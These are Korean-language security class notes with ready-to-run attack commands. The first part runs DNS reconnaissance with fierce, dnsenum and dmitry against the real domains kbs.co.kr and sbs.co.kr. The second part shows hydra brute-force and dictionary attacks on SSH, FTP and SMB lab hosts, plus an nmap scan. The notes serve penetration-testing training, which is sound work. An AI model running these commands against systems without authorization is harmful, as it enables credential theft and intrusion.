[2024.05.23]
[DNS Scan]
> 사용 도구: fierce
01. fierce
#fierce --domain kbs.co.kr
#fierce --domain sbs.co.kr > fierce.txt
02.dnsenum
#dnsenum kbs.co.kr
#dnsenum kbs.co.kr > dnsenum.txt
03. dmitry
#dmitry kbs.co.kr
#dmitry kbs.co.kr > dmitry1.txt
#dmitry kbs.co.kr -o dmitry2.txt
=====================================
[Password Attack]
01. 무차별 대입 공격, 사전 공격(Brute Force Attack/Dictionary Attack) 실습
* 무차별 대입 공격 (Brute Force Attack) 설명
> 사용 도구: hybra(많이 사용), medusa
hydra -l test -p 123456 ssh://192.168.10.50
hydra -l test -p 123456 ftp://192.168.10.50
hydra -l test -p 123456 smb://192.168.10.201
hydra -L /root/id.txt -s 2121 -P /root/pass.txt ftp://192.168.10.50 -f -V
hydra -L /root/id.txt -s 2002 -P /root/pass.txt ssh://192.168.10.50 -f -V
<옵션>
-l: 계정 지정
-p: 패스워드 지정
-L: 계정 사전 파일
-P: 패스워드 사전 파일
-f: 패스워드 찾을 경우 중지
-V: 계정/패스워드 대입 과정 출력
-s: 포트 지정
*포트 상세 정보 확인 명령어
#nmap -sV 192.168.10.50
2. 사전 공격(Dictionary Attack)
3. 추측 공격(Guessing Attack)
Brute Force / Dictionary
